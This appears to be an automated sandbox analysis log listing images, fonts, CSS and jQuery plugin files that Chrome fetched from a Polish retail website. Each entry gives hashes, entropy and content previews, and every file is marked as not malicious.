                                                            Preview:......JFIF.....^.^......Exif..II*........... ...................................................................(...........1...........2.......2...;...@...F...................@...................i...........%...........$...OLYMPUS DIGITAL CAMERA .OLYMPUS IMAGING CORP. .E-M1 .^.......^.......Adobe Photoshop 7.0 CE.2018:07:26 12:43:06.................................................................................................................................PrintIM.0300..%.............................................8.................P.....`... ..................................................................................................... ......................................................'.......'.......'.......'.......'..^....'.......'.......'.......'....................................................................................................................................@@........@@........@@............@@........@@........@@..................
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):383
                                                            Entropy (8bit):4.992105234988886
                                                            Encrypted:false
                                                            SSDEEP:6:UoPS47MxFFPfHaLgEO14Zou+LfJemXsCPvX9IiV4TUu3uRFh4tSHug3RIT8n:UoPB76n914ZbEBeveWJN+6ghC8
                                                            MD5:2C92C459B0F7FB738470A2C44DE47435
                                                            SHA1:9749B071CE82865C8238FBF4AFD06362F42088E6
                                                            SHA-256:16AE7959EFC9A0EBD0BA0E8AEF791DF0D76D4119E560C3E9EA77B53BD8098A3D
                                                            SHA-512:0946FF6C236A48C670739A4E3570813B1B17479D55B4B390EAE54896D6C47A5A1348B7ED0D72EBEE6C025138EBF5D65BE8E17F0971A0FA295C09D7B3B4247069
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/*. * FancyBox - jQuery Plugin. * simple and fancy lightbox alternative. *. * Copyright (c) 2009 Janis Skarnelis. * Examples and documentation at: http://fancybox.net. * . * Version: 1.2.6 (16/11/2009). * Requires: jQuery v1.3+. * . * Dual licensed under the MIT and GPL licenses:. * http://www.opensource.org/licenses/mit-license.php. * http://www.gnu.org/licenses/gpl.html. */.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 210x210, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=12, description=OLYMPUS DIGITAL CAMERA , manufacturer=OLYMPUS IMAGING CORP. , model=E-3 , orientation=upper-left, xresolution=231, yresolution=239, resolutionunit=2, software=Adobe Photoshop 7.0 CE, datetime=2018:07:26 13:56:12], baseline, precision 8, 437x422, components 3
                                                            Category:dropped
                                                            Size (bytes):77710
                                                            Entropy (8bit):7.727875314287752
                                                            Encrypted:false
                                                            SSDEEP:1536:DyLg4xyLg4xtiysYg886crRhVmCdkTbwBrwHT5jrv73t7kE5:D6N6GyR86cTmC5BrwljdZ5
                                                            MD5:7C221DDBAA0EF53870040E14EBAD2A40
                                                            SHA1:C89B4F06A378005F805016FDC32B8B0D674E9DA7
                                                            SHA-256:FCFA555D3D3E6D3C778057644E4937F7DBAD4E4AB7521055912E8DDB47819E3A
                                                            SHA-512:1F4DC130807D90B92B13B23CEEBC1EAC0394C3B901A806061E32EC49E50B361A4AAB1485B1F270ACFFCC79D3AD8DFEF3319A8697612A54F15719AEA6C13F2547
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:......JFIF............"/Exif..II*........... ...................................................................(...........1...........2..............................."...i.......4...l...OLYMPUS DIGITAL CAMERA .OLYMPUS IMAGING CORP. .E-3 .................Adobe Photoshop 7.0 CE.2018:07:26 13:56:12.PrintIM.0300..%.............................................8.................P.....`... ..................................................................................................... ......................................................'.......'.......'.......'.......'..^....'.......'.......'.......'....................................................................................................................................@@........@@........@@............@@........@@........@@.........................................................."...........'.......}...........0221........................................................................................
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=12, description=OLYMPUS DIGITAL CAMERA , manufacturer=OLYMPUS CORPORATION, model=C8080WZ, orientation=upper-left, xresolution=218, yresolution=226, resolutionunit=2, software=Adobe Photoshop 7.0 CE, datetime=2018:07:26 14:25:14], baseline, precision 8, 500x500, components 3
                                                            Category:dropped
                                                            Size (bytes):52878
                                                            Entropy (8bit):7.615682104172851
                                                            Encrypted:false
                                                            SSDEEP:768:0ivgGcbYy5wbC5a/ppSCZQ0GKZKei8ANktgDiktyHt9oPE+gbqa7yuDuPqbFl+p5:0DG4+/hKaXi8kxPt8R7nl+3
                                                            MD5:CAC8ABBBC533E19202CDFAA26B4AA40B
                                                            SHA1:ADDEB4832A02C1F7D3400B0D274866079D416815
                                                            SHA-256:BF2B9DB87D709849006D41589E708FDFEA96920E10F2D1B5BC4F5D2530F4D7FB
                                                            SHA-512:D14FAA93A4A9E3D2F96AB08C13F7A42FD77D8CEF912579474E18352F079BB5CE76DA533D2ACDB29CA52F00B2E612B6CFD51971962FDCDFB9CA7A1BF5D412C893
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:......JFIF.....,.,.....qExif..II*........... ...................................................................(...........1...........2...................................i.......H.......OLYMPUS DIGITAL CAMERA .OLYMPUS CORPORATION.C8080WZ.,.......,.......Adobe Photoshop 7.0 CE.2018:07:26 14:25:14.............................................................................."...........'.......2...........0220................................................................................................................}...............0100.................................................................................................................................................................................'..........2007:08:02 15:25:27.2007:08:02 15:25:27................................. ....d..........................................(.......................
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:downloaded
                                                            Size (bytes):16
                                                            Entropy (8bit):3.875
                                                            Encrypted:false
                                                            SSDEEP:3:HTL:zL
                                                            MD5:C78FC4C73991971736F95F00B7C09E4F
                                                            SHA1:2BFE006346297E446B58308E3F37169A4BC29046
                                                            SHA-256:C70E533105E5FE64092A52295354E975F8D6DDF470DA3F7AE4A6D4F3FC915283
                                                            SHA-512:5F85D1EA2C4DB38DF3A6FC5414C03EDA186CF86A84F9D0E4C37053791060936B486A0493B54010319FCBA943ED4E95F58045C3EDD135952E69CED9EE87BD21F0
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAnr94gWZvZMMRIFDbtXVmo=?alt=proto
                                                            Preview:CgkKBw27V1ZqGgA=
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 150x150, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=12, description=OLYMPUS DIGITAL CAMERA , manufacturer=OLYMPUS IMAGING CORP. , model=E-3 , orientation=upper-left, xresolution=231, yresolution=239, resolutionunit=2, software=Adobe Photoshop Elements 7.0 Windows, datetime=2018:01:15 16:53:54], progressive, precision 8, 886x367, components 3
                                                            Category:downloaded
                                                            Size (bytes):247906
                                                            Entropy (8bit):7.957303310703297
                                                            Encrypted:false
                                                            SSDEEP:3072:m16np+Wl2DKbLC2j/HWTbC9uWzZOS0Sj2eZ4/Xos7uwrj0zXphJhF8+Sqhxtd3LZ:m1NDQCwAwzZOS0c2B/B6znhW+HUdA
                                                            MD5:BE5FA6C3EE0B6CD855990C5D88A2031E
                                                            SHA1:467C8F4B7CA4562628D078B58C2EC5CBD8CD5FC0
                                                            SHA-256:CFF8B2152891BBD60BA6324B6CF1F2AFFEFE4483CE9D18EE5D0B84F1CA1F637C
                                                            SHA-512:85CF010BB01D79E27591CCAE09D6B3B578AAF6E4FDB88E3A1943618B9A69CE706A10B6F2DEB63D1B65300D9CE310C40A2A1952CC159187A2F2E162CF00C1E70E
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2018/01/mickey_cr.jpg
                                                            Preview:......JFIF..............Exif..II*........... ...................................................................(...........1...%.......2...............................0...i.......@.......OLYMPUS DIGITAL CAMERA .OLYMPUS IMAGING CORP. .E-3 .`....'..`....'..Adobe Photoshop Elements 7.0 Windows.2018:01:15 16:53:54.PrintIM.0300..%.............................................8.................P.....`... ..................................................................................................... ......................................................'.......'.......'.......'.......'..^....'.......'.......'.......'....................................................................................................................................@@........@@........@@............@@........@@........@@........................................................"...........'...................0221............................................................................
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Web Open Font Format, TrueType, length 13988, version 1.0
                                                            Category:downloaded
                                                            Size (bytes):13988
                                                            Entropy (8bit):7.960184831966907
                                                            Encrypted:false
                                                            SSDEEP:384:K5vwhKNeXPq4KxiB9wrHxn51Gvo6JOvD0q0ZS:K9wDtbeb4JoZX
                                                            MD5:5A232D0DAAF2562BF4910C1F699EEAAB
                                                            SHA1:A07F3DAA46691580836ACB6CA6B38FCC89602856
                                                            SHA-256:3B4AE61D6E9FB6FA5D10B2390885F2E68F4443285D5B2E17C782393C6ACF793F
                                                            SHA-512:3E781762580ED016CA1F1113B1BE918BFEFBD64BEAD6277712941CE106C3A084C5E5E2F9629F7E1D2BD87982ABA643C16F8D7F58D28D9FE61E3F014DBDE36ABA
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/themes/salient/css/fonts/OpenSans-Regular-webfont.woff
                                                            Preview:wOFF......6.......P.........................FFTM...l........_..(GDEF........... ....OS/2.......]...`.6~.cmap.............[,<cvt ... ...@...@.f..fpgm...`.......e../.gasp................glyf......+...B.XA..head..0....3...6.N..hhea..0........$....hmtx..1...........1.loca..2.............maxp..3.... ... ....name..3.........%8@Qpost..4....(....3...prep..5........|.`.,x.c```d...... .4..J(]..>....x.c`d``..b...`b..[.$............x.c`faa......:....Q.B3_dHc.................B4.....3.:.;3...0....ah..e.P``...c.`....\..!.a...x.c```f.`..F..8..1..,.+........P..a1.R......(p).(H*.*().).+.+.QTz...?P..P."...@u......2...?...............Y.R.$=Hx.. .A......'*.@.C.`dc.+fd..L...^daec........................WPTRVQUS........70426153........wptrvqus........................OH$..).0d.Hk...bSV...**kj....&b.....J.......H.....K.e.u.y...............`.w.{..........................x.]Q.N[A........ 9.......6H ....vc9B.\.b\..P Q..k.h(S.M...$>.O...5..4;;.s.3K..wi..s.H.n.f.~'..E.....FF..#-63z.}...f4.N.@y.[.CF.N..
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (1193), with no line terminators
                                                            Category:downloaded
                                                            Size (bytes):1193
                                                            Entropy (8bit):5.032731338787412
                                                            Encrypted:false
                                                            SSDEEP:24:pY4YRVssO7j2I2t3Sr+Eq5D3Djqd/+XGDPDLUDORZGbMDbhLM9yAf6CKu4:l6VssKKLt38qdz0gqbcOLGbwbhM9yo6v
                                                            MD5:F34F415AA56ED900EECF3F212ADB57E2
                                                            SHA1:352DFEEC21817198C07AB11705B53D813420CEA3
                                                            SHA-256:7F34B768792B90CF0B04FCED2470E43D8FAB7644F6565D5178FBFB49C4859CEE
                                                            SHA-512:361BFEB636F7D73DF236059BB7568C40E74FAB5639C5CCCCDC598A70EC37695265FB08AEF61DB1F9FD927775000852F42720B43722E8D6C6FE3A8F5A568FECE2
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=5.8
                                                            Preview:!function(a){void 0===mejs.plugins&&(mejs.plugins={},mejs.plugins.silverlight=[],mejs.plugins.silverlight.push({types:[]})),mejs.HtmlMediaElementShim=mejs.HtmlMediaElementShim||{getTypeFromFile:mejs.Utils.getTypeFromFile},void 0===mejs.MediaFeatures&&(mejs.MediaFeatures=mejs.Features),void 0===mejs.Utility&&(mejs.Utility=mejs.Utils);var e=MediaElementPlayer.prototype.init;MediaElementPlayer.prototype.init=function(){this.options.classPrefix="mejs-",this.$media=this.$node=a(this.node),e.call(this)};var t=MediaElementPlayer.prototype._meReady;MediaElementPlayer.prototype._meReady=function(){this.container=a(this.container),this.controls=a(this.controls),this.layers=a(this.layers),t.apply(this,arguments)},MediaElementPlayer.prototype.getElement=function(e){return void 0!==a&&e instanceof a?e[0]:e},MediaElementPlayer.prototype.buildfeatures=function(e,t,i,s){for(var r=["playpause","current","progress","duration","tracks","volume","fullscreen"],l=0,n=this.options.features.length;l<n;l++){va
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 250x250, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=12, height=2448, manufacturer=samsung, model=SM-N910C, orientation=upper-left, xresolution=175, yresolution=183, resolutionunit=2, software=Adobe Photoshop Elements 7.0 Windows, datetime=2017:09:08 14:15:40, width=3264], baseline, precision 8, 787x500, components 3
                                                            Category:downloaded
                                                            Size (bytes):165118
                                                            Entropy (8bit):7.958681807563896
                                                            Encrypted:false
                                                            SSDEEP:3072:sE3xHCtcxpAMkZYmBCoEPMr/sXlceCDY3qMW+/SxTH9u0jvyRs1v:Z8t7MkZuohr/sVbC/RtTH9Tras1v
                                                            MD5:F883D9CA48C2FB974D7C7CD687EC62CB
                                                            SHA1:71A7D91550418C6D6758F65E13F5816A5A616DDF
                                                            SHA-256:661945661B0A36CC8ECEF79E59277BB3CAB087F16F1199ED7FDBA3EF8CA3C46A
                                                            SHA-512:52538811A847F96218DE7050719F860B65B7D756293E109248943E054773B4FD5C96FE0E1F689942C026EB913A63151984CB17B94DB30DC686901FC468248356
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2017/09/p-70200s-787x500.jpg
                                                            Preview:......JFIF............+qExif..II*...........................................................................................(...........1...%.......2.......................i...............samsung.SM-N910C.................Adobe Photoshop Elements 7.0 Windows.2017:09:08 14:15:40...........*...........2..."...........'...................0220........:...........N...........b...........j...........r...........z.......................................................................0100................................[................................................... ...!...............!...........2016:09:15 14:43:46.2016:09:15 14:43:46.....d.......d.......d...............d.......d...ASCII......IICSA.....b484d149d65b8f500000000000000000.......................................(...................&...........C(............................JFIF.....H.H......Adobe_CM......Adobe.d.......................................................................................................................
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, non-interlaced
                                                            Category:downloaded
                                                            Size (bytes):22974
                                                            Entropy (8bit):7.976706380029138
                                                            Encrypted:false
                                                            SSDEEP:384:ISpWoWdp6CuWViJI/W6+cUJhkFSNDUs/q+je+oEDc4pGY0MfwIC/3Y8YA3C:7WoWvnMIj+cUs4NtRXFo4n0MtCdy
                                                            MD5:0DD8906F0895BB6DFF1125036276462A
                                                            SHA1:F73E58C61D721682F8F6172DCE27EEAC7ABFB145
                                                            SHA-256:10887D5C59A50A8DDF9D861F628B63E04B4A5BA4FCB2E3848F0DD18369F7923A
                                                            SHA-512:48B8101931AB95B8065EC4F8E80B482C544E34ECA80695DC8A07BA6C3D35620E464BA0556541B93F4BDD53023F51F0A0E9D9537222CD320F3E29178EA367ED0E
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/07/disney_mickey_mouse.png
                                                            Preview:.PNG........IHDR...,.........r|......bKGD..............pHYs...#...#.x.?v....tIME...... ..i... .IDATx..y.]Wu..9..o.Ws.J.d..I.mb.6..0...H......_..d..I.I:....@..NH.!L.....6.l..X.JR..yz.}w8...xUe.C:.6&9...V....=..>......b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,..... ..^X.1n......pg.Z...a1I.........W......e2...!.k.+X..D.V..;33.R.tY.P.P(...I.R..o..c@.E.aH.V.Z.R.Vioo?...{w.P.]!Dl.d...Z....>8::..B..moo......_....J%j.Zc........+\V.~..z...g...B..100`..........jua.M....>b.E+X?.b.>s...J...]K&..F.7D........M.6.&.hZ.X.z1...Zo;r...U.Vu...Z...fff....].v.".<!.0.*V.^,b..A.....cG.zU.eokpp..c.wg2.O.!.......X5....:u.c;v..l..r!Q.188._r.%...f?iE...4.TJ]v...}W\qE...D.......op.....`....m...c.^zi[.....<'.z...W...B.......&...*}.......XY...r9....N.8.1&m-b...+wnn.J...... ......(.v........Z....%X....n.....=.a.......1.h.a...+odd..;;;.6..|?.agggaxx.....Z.....sbb......|_.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 592 x 254, 8-bit/color RGBA, non-interlaced
                                                            Category:downloaded
                                                            Size (bytes):6868
                                                            Entropy (8bit):7.875096151329066
                                                            Encrypted:false
                                                            SSDEEP:96:VZ/I09Da01l+gmkyTt6Hk8nT/LXU4+7A8ZDR8Cv7uTJNUDihA3PnM/AirhNnc8Zg:VS0tKg9E05TY4+vHHfM/AilNFUh
                                                            MD5:AF8BB375CB9DD7C49A3DE7B7375E6CF5
                                                            SHA1:52CEB3DB135A44ED13F1BD1956803B336F52C778
                                                            SHA-256:7D8254BF11C02A7278B2A6D97737A257F1D3A86351858C8627EBA4AF12743753
                                                            SHA-512:7C4B8FF1B3839D615B357D94C5A05D38F6060BF4EFE1BDF5DED6AC43FF32FF4DA107250DD0A5482A352E9E8C67A135155AF3D29183B6CA9EACE609550E29D150
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/07/Disney3.png
                                                            Preview:.PNG........IHDR...P..........k;.....pHYs...#...#.x.?v...OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text
                                                            Category:downloaded
                                                            Size (bytes):4337
                                                            Entropy (8bit):5.262762057385937
                                                            Encrypted:false
                                                            SSDEEP:48:t3tOEQPXgXIK93SfXgXIK9byXgXIK9e0vVggmf4dhiQVdSX4Cf8PocQNBKoYDigs:fmXgXIg4XgXIjXgXIyeM/j844Lb
                                                            MD5:3A7E87EAE56C62244BFA5EB7CC899311
                                                            SHA1:C8D2EB8E7B6FC7F784C4FBF2ACF019B08B49BFA1
                                                            SHA-256:FD67553D071F1E8BFE86A152AE6827F0F86B505AEE73DE8EC3D7A0A77F03419A
                                                            SHA-512:4F12F6E4C5DF2AC0677CF94C0F2044363A50470E010C21B397F30BD4D2A46F25FBC5EDE457521CE4B6573C1486F1D15321CB247DF68E7F9086A91CDFA75B6D04
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/themes/salient/css/rgs.css?ver=6.0.1
                                                            Preview:* { -webkit-box-sizing: border-box;..-moz-box-sizing: border-box;..box-sizing: border-box; }../* MAIN CONTAINER */..container, #post-area.standard-minimal.full-width-content article.post .inner-wrap.{ margin: 0 auto; position: relative; }...container, #post-area.standard-minimal.full-width-content article.post .inner-wrap {. max-width: 880px; .} ..@media only screen and (min-width: 1300px) and (max-width: 1500px) {...html body[data-header-format="left-header"][data-ext-responsive="false"] .container, html body[data-header-format="left-header"][data-ext-responsive="false"] #post-area.standard-minimal.full-width-content article.post .inner-wrap,..body[data-header-format="left-header"][data-ext-responsive="false"] .nectar-recent-posts-slider .flickity-page-dots {.. max-width: 900px; ..} .}.@media only screen and (min-width: 1150px) and (max-width: 1300px) {...html body[data-header-format="left-header"][data-ext-responsive="false"] .container, html body[data-header-format="left-head
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, interlaced
                                                            Category:downloaded
                                                            Size (bytes):19101
                                                            Entropy (8bit):7.976466090959319
                                                            Encrypted:false
                                                            SSDEEP:384:IaX0b2nze7nZLs9RW/tka8NPtpKXa9wk2APWJGchAGIhWTzUCnZZLUkb:d0SnSdLsXWz87pUgr4rIhW3U4ZZJb
                                                            MD5:9DF022E7B26F5A7A3A63CC0FD24A7E30
                                                            SHA1:15902947EE507B0D196BF45BE1FB409D8C10C6DA
                                                            SHA-256:9B97E1ACD91BE36B6FBC932BBD1079930A5282F6DBA5A776D4979C76BDA99D19
                                                            SHA-512:A5BA0565F120F9D7EA553C9FA9D90AB28213AB95CAE274DF31263DD3AE81688B357801D2961ED56E1FF7176F76F2A4F74758F9C55184C78F7427B13DBE76049E
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/07/carefour_glowna_thumb.png
                                                            Preview:.PNG........IHDR...,..........{.=....pHYs...#...#.x.?v.. .IDATx...xSW...m.J.............m......6...c.`P.....w)R(...jPo....iB.Fn.I..=.}r..s.....{.....E...@.L0C)..=|.0?,,..9..h.`..........<w.....7...l.9..@.....h7.w.Y<.H.....|.3I..6..y....|.&.....T....[.5*n..S.Ei6aS..T0.G.eH.?.x..BiC..R.$.9EJZL...>3...0X0.....[.!{.D....v...|...."..Od..de..b.i.....kT(J..eq:2.(.....2.{HV/....cN.e.)....L..B.R@.PUrS.2Y..*.*..v)&...<4..3.S.E...Y|....A.4...D.E..]...a.6$.e.v......................./...t...7v_|.yc[...M..T...Z..[......=.....q|. .9r.....q....9.M.4.wtt.iV..\...u.....<..m...',o..P..~...'.......q...4h`..,>......=e2.......j..@......aj.q.g....SY(..qss.I..l-.v......O..B..B.l..3 .x.eQC.3..f.,.#..F....3..R".2...~.zr.Z.|..5...Hy8.@>...4../..*666?$$...8.@....*00P...65.~,.^].!5S.3G...P....]"R._ .*.T.....G....>#.38.....V.*....m...j.{.^....o......YE.+RE.b..8..L..U....".`.I...[....J....."K'.5%:......C.;/E...t.q......Udx..`.T....`............9....5.2....m..'o(.m......b....
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, interlaced
                                                            Category:downloaded
                                                            Size (bytes):26938
                                                            Entropy (8bit):7.98730517798616
                                                            Encrypted:false
                                                            SSDEEP:384:ItOtjGU54krQDWsodtpAdNhEN5Ln65nm0moGCOIQLzuHwci/9w57QnWllPYJaWlE:8eaUaklLtpAdmL600PkWwcbq+PYJaWlE
                                                            MD5:6EA52D453B8C2C6F73DEC17053207161
                                                            SHA1:D65E05AB2E898555B2389582C3D07A099AC22EA3
                                                            SHA-256:C73854BE9836582D74DEB9F09C6059986131FEF24846068CEF3DEC95CEB7378B
                                                            SHA-512:3E38571DF93D0E0FD9D8F9E6970F46576C966519836C78D066BF293501D54F1053CE28A9FEA288C7DDDF5B147AAE75F1D2B3F3F93CBF282DCDFEECD6E7DB1150
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/07/smyk_glowna_thumb.png
                                                            Preview:.PNG........IHDR...,..........{.=....pHYs...#...#.x.?v.. .IDATx...`.E....[........7A..... ................".......@BMH.....{..@..$pG.p...eow.........Z,.8".6.18..aXzz.%<<.F..k..1.F.b.@....2!!.H.....M7L.Rui.v....s*.....@..2.....Wl..m(.N.....?..}.K....]!.....W...a..y.Q.W...-.7.v...1._...^.b.;........k...e......?.......8...P......e..8R...}G.v.0`r....3...[.Qa...B.}...s..p.)!.w.!y.8....&%).2.w&...X!....V.'...}_..y...;.~.fkL.3...".........~)1o...Yl......*x....]o......a....1"...36m.%....z.X.7O)......G.....J.....4.i.g.......7.(..r.%.|.i..P...Sq.....}..s/...P..A...-.}.U..:Dm.e.....~*.Z.....\.m..^.!nQ.oOn.a|>.}S.k.a..G\\..[D..f..8pLS.m.ad.....1cF.@ h.Q'O.D||.]"X.3.Uuu.=F....x<.UM-<......m.k..c5.02..P(.W(.9.9@...B?Zv..02.L...iT]......kF...o.e.`c.T.oK..:b..Cz}..rK.u.w..'J;t....Y.'.i.......A.,..dTff.%44.Flb!...]......!c.K......IFQ8.......;..*. '..../....~F....../~6.F.....h.u....@......*.......g.;....".9..31..<..B.....~......Q..m8.......sm:...
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (11277)
                                                            Category:dropped
                                                            Size (bytes):11295
                                                            Entropy (8bit):5.526291359818204
                                                            Encrypted:false
                                                            SSDEEP:192:KKirvjKPsO/kAvi8uErTNi7OasUrxq0G/2X8EpW7QYovE3aCn9MOYFfycBmSCc:KtesO/kAOErTNiSasUNqpo8EpW7QYosm
                                                            MD5:C111C3F8FE864ABCA632348A67AC2E02
                                                            SHA1:5A9BB456B170C9172C30C86D3686032DE0A3A97A
                                                            SHA-256:19BE9961450C68D8C3C1A188ECB9EECCA5BCA8B271664025A85A88F903CB6B41
                                                            SHA-512:9CA9ECB097379ABAC20E4D7C5A917E42DF2C01A3185E698CBEBB1968614B5258BD1DA1D45B220F7A3620417DC9845B540FAF8E25B230FA4D57CC9306C95BAB65
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/* Touch swipe */.(function(d){var m="left",l="right",c="up",s="down",b="in",t="out",j="none",o="auto",i="swipe",p="pinch",u="tap",x="horizontal",q="vertical",g="all",e="start",h="move",f="end",n="cancel",a="ontouchstart" in window,v="TouchSwipe";var k={fingers:1,threshold:75,cancelThreshold:25,pinchThreshold:20,maxTimeThreshold:null,fingerReleaseThreshold:250,swipe:null,swipeLeft:null,swipeRight:null,swipeUp:null,swipeDown:null,swipeStatus:null,pinchIn:null,pinchOut:null,pinchStatus:null,click:null,tap:null,triggerOnTouchEnd:true,triggerOnTouchLeave:false,allowPageScroll:"auto",fallbackToMouseEvents:true,excludedElements:"button, input, select, textarea, a, .noSwipe"};d.fn.swipe=function(A){var z=d(this),y=z.data(v);if(y&&typeof A==="string"){if(y[A]){return y[A].apply(this,Array.prototype.slice.call(arguments,1))}else{d.error("Method "+A+" does not exist on jQuery.swipe")}}else{if(!y&&(typeof A==="object"||!A)){return r.apply(this,arguments)}}return z};d.fn.swipe.defaults=k;d.fn.swip
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, interlaced
                                                            Category:dropped
                                                            Size (bytes):22453
                                                            Entropy (8bit):7.981030882286753
                                                            Encrypted:false
                                                            SSDEEP:384:ItbaFm82/gbuFVdy4OdPrLJSjV4fmCtK3sBkS8Y2A0W7Maz5RcsZwg4Z9YP:o83uFVdZ6nJSCmlZTY2AtMazjiv9Q
                                                            MD5:7241D918B29096CAEE3356C6C266AC7F
                                                            SHA1:B27F15DCAF7C707BCDADE3A62FE329D6F411090C
                                                            SHA-256:E7AE67C307DDE8630927FF4648A837DFA2AC663F92FE9FA2B523BDF5DAC97DFE
                                                            SHA-512:89C37380D879B24151AA496555F50E4EA4392126375DBDF90E49367AE587448761EFEA96B6FAA1CF21BB589D1A294C44D5CDE423089963C70205A74C02A38751
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...,..........{.=....pHYs...#...#.x.?v.. .IDATx..].`....fv...................{.?{...={..(.(...4i..P..{.d7[g.sg..1@.w.n.O....s..w.{.w...$!.!.....b........I.....|\w..c.5J...4./..k.]?f...K.a........#...w......6z.6......M2.....4T....k/..h.d.o...o.Al...2.x.:h.vV..M..0....@)..'..#.G..8H^/8.."../.!+....y......17..].=.cd...Q.B.....Z......."x...:..2..T.i.....m*...C9....~..o...}.h<.....#..X.........,.....v7.....ws..o(..G%B0u.\~.v.k.eb<./........B.+..)G._.{.....q6S.."..\...Kx.....T.....j...6.u......H.V...z.~.....I.3.y~~w.u.M.6a.aGn.A.E.{.gw'm..#....{....oLU......[.n..#......o.g....x<.O.q.9...;.g.....4(.su.02.. ..F....t@.}&.gE@.#......Q.......#..#...0.#..5..-.C..N..T}..W.u.b.-......NZ.:O....dP..m.X.t.v.[F...K}...36. ....[F%%%..w.0t...Q...v.(rG..}.....o.$.D...Q.Kj....Sl.Zj.z............q3...)..x)..~..Q.?~..c.a]c..J.E...nH^..A...u....Q..^...8.rw..(7..<.o..sv....H.7..F.\._........|..C>V.d....hD/l..h......(....<.:-.z|....R....T7.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (2949)
                                                            Category:downloaded
                                                            Size (bytes):2984
                                                            Entropy (8bit):5.176730561540549
                                                            Encrypted:false
                                                            SSDEEP:48:Q7A9/XN5NjJE2aAOuRQLKfTnwAuw5BJFVhl2qFqycynUPzm6uuPkSEwE/ZGkrXyl:931HfUAJ5F/FqyPUC6uBIkrXyAESyO16
                                                            MD5:3B59C3B33879D70B46063089EC505E03
                                                            SHA1:4054DBF1C08E09D8514DF72DBE137D02EFAE907A
                                                            SHA-256:143CE443C390DB3B8598F951DE20BD04623859A581A15B8CDE43EBFA1F8EC103
                                                            SHA-512:7CCA3C9B3E33AAA441FB38C7CDA42719B12DFD462BAD17723E4286398517322806E0164353E5ECD9D85DCB8064D009A7688797912DEFFCA4D8F12ED1B9184F6A
                                                            Malicious:false
                                                            Reputation:low
